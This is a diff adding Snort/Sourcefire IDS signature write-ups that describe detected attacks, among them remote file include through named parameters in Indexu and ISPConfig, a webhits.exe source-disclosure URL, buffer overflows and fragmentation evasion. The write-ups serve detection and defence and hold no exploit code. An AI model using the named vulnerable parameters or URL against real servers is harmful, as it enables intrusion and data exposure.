+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/612.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+612
+
+--
+Summary:
+This event is generated when a request is made via Remote Procedure Call (RPC) to list the logged in users. 
+
+--
+Impact:
+Reconnaissance.  A response to this request provides valid user names that can connect to the host.  
+
+--
+Detailed Information:
+The rusers RPC query is used to discover the users currently logged on to the host.  A response to this request provides valid user names that can connect to the host.  This information can be used to attempt a brute force guessing of associated passwords.
+
+--
+Affected Systems:
+All systems running rusers.
+
+--
+Attack Scenarios:
+An attacker may attempt to list all logged in users to gather information for a future brute force password attack.
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list users, this will generate a false positive.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0626
+
+--
--- /dev/null
+++ b/doc/signatures/100000624.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000624
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_create.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_create.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/682.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000489.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000489
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ISPConfig" application running on a webserver. 
+Access to the file "login.php" using a remote file being passed as the 
+"go_info[isp][classes_root]" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "go_info[isp][classes_root]" parameter in the 
+"login.php" script used by the "ISPConfig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ISPConfig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1607.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1607
+
+--
+Summary:
+This event is generated when an attempt is made to access hsx.cgi on a 
+web server. This may indicate an attempt to exploit a vulnerability in 
+the Hyperseek 2000 search engine that allows read-access to directory 
+listings and files.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate that an attempt has been made to exploit a 
+directory traversal vulnerability in HyperSeek 2000. An attacker can use
+directory traversal techniques to view hidden files and directories on 
+the web server.
+
+--
+Affected Systems:
+Web servers running iWeb Systems HyperSeek 2000 are vulnerable. 
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques when executing 
+hsx.cgi to view directories and files on the web server.
+
+--
+Ease of Attack:
+Simple. Exploits exist. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uprade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2314
+
+CERT/CC
+http://www.kb.cert.org/vuls/id/146704
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0253
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10602
+
+--
--- /dev/null
+++ b/doc/signatures/100000635.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000635
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_delete.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_delete.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1781.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1781
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "dildo".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "dildo".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/431.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+431
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Type 40 Code 2 Decompression Failed datagram.
+
+--
+
+Impact:
+ICMP Type 40 Code 2 datagrams are an indication that a received datagram failed a decompression check for a given SPI.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 Code 2 datagrams are generated when a received datagram fails the decompression check for a given SPI (Security Parameters Index). 
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
--- /dev/null
+++ b/doc/signatures/805.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+805
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in the WebSpeed WSIS Messenger 
+Administration Utility. 
+
+--
+Impact:
+Information gathering and system integrity. Unauthorized administrative 
+access to the to the WebSpeed configuration utility can allow an 
+attacker to view and change WebSpeed configuration, and possibly stop 
+WebSpeed services.
+
+--
+Detailed Information:
+The WSIS Messenger Administration Utility is a web-based administration 
+utility provided with the Progress WebSpeed 3.0 development environment 
+and transaction server. It allows WebSpeed administrators to remotely 
+manage the WebSpeed system. The configuration utility has a 
+vulnerability that allows unauthenticated users to configure services 
+when the WSMAdmin function is invoked using wsisa.dll.
+
+--
+Affected Systems:
+Any system running Progress WebSpeed 3.0 WSIS Messenger Administration 
+Utility.
+
+--
+Attack Scenarios:
+An attacker can access the WSIS Messenger Administration Utility, which 
+can then be used to view and change WebSpeed configuration. The attacker
+can potentially stop WebSpeed services. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses the web-based administration 
+utility, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the WSIS Messenger Administration Utility.
+
+Install the appropriate patch. Patches can be found at
+http://www.progress.com/patches/patchlst/availpatche.html.
+
+Disallow access to the WSIS Messenger Administration Utilility from 
+sources external to the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/969
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0127
+
+--
--- /dev/null
+++ b/doc/signatures/3026.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3026
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2288.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2288
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1073.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+Sid:
+1073
+
+--
+
+Summary:
+This event is generated when an attempt is made to read web application
+source code.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+The webhits.exe sample program that comes with Microsoft Index Server in IIS
+contains a vulnerability that allows the reading of web application source
+code.
+
+Sometimes web application source code contains highly sensitive information,
+such as database passwords and information concerning backend setups.  This
+could be a prelude to further attacks.
+
+--
+Affected Systems:
+	Microsoft Index Server when deployed in conjunction with Microsoft IIS.
+
+--
+Attack Scenarios:
+Attacker sends a simple URL like the following and then chooses which
+file they want to view:
+http://servername/scripts/samples/search/webhits.exe
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the samples directory from the webserver.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+http://www.win2000mag.com/Articles/Index.cfm?ArticleID=475&pg=2
+
+http://secinf.net/info/www/cgi-bugs.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2937.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2937
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2171.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2171
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3092.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3092
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2885.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2885
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_priority_group
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2659.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2659
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3104.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3104
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/522.txt
@@ -0,0 +1,86 @@
+Rule:  
+
+--
+Sid:
+522
+
+--
+Summary:
+This event is generated when an IPv4 fragment of dubiously small nature 
+was detected.
+
+--
+Impact:
+Many IDSes are known to have issues regarding the reassembly of IP
+fragments, and could miss an attack carried over such means.  Firewalls
+suffer from the same issues, and can be tricked into allowing packets
+through that should normally be rejected.  Furthermore, there is a small
+history of OS issues related to unorthodox fragmentation.
+
+--
+Detailed Information:
+IPv4 manages to adapt to various link layer protocols on a route via the
+fragmentation mechanism outlined in its RFC.  A router connecting two
+carrying media of varying MTU (Maximum Transmission Unit) can fragment
+packets of size too large to transmit on one wire before dispatch.  When
+datagrams stay within one MTU, the maximum packet sizes possible can be
+used without fragmentation, thus pairing flexibility with efficiency.
+
+Historically, handling of fragmentation has been less than stellar in
+both IP stacks and the IDS systems designed to protect them.  While the
+limited number of attacks based on fragmentation are easily picked up by
+anomaly- or signature-based system, IDSes which fail to properly
+reassemble fragments can miss any attack which is so fragmented.
+Firewalls have often proved susceptible to fragmented TCP or UDP
+headers, allowing traffic which should have been filtered to pass
+through.
+
+--
+Affected Systems:
+Any IDS/firewall lacking proper IPv4 fragment reassembly.
+
+--
+Attack Scenarios:
+An attacker may pass a fragment containing a TCP/UDP header which is
+allowed to pass through a firewall, then follow this up with a fragment
+which overwrites the previous headers, but is allowed due to poor
+connection tracking.
+
+An attacker may fragment an exploit, so that it is not detected by IPS
+nor filtered by IPS products.
+
+--
+Ease of Attack:
+Tools have been written to trivially fragment traffic; Dug Song's
+fragrouter program is a well-known example.
+
+--
+False Positives:
+It is unlikely that such a fragment would be seen in standard use of
+IPv4; while the last fragment in a series is typically smaller than the
+others, this signature explicilty matches the More Fragments bit.
+Nonetheless, a pedantic reading of the IPv4 RFC allows this, so long as
+the data length is a multiple of 8.
+
+--
+False Negatives:
+Attacks may still be fragmented into larger chunks.
+
+--
+Corrective Action:
+None
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nick Black, Reflex Security <dank@reflexsecurity.com>
+
+-- 
+Additional References:
+
+IPv4 RFC:
+http://www.faqs.org/rfcs/rfc791.html
+
+--
--- /dev/null
+++ b/doc/signatures/878.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+878
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000625.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000625
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
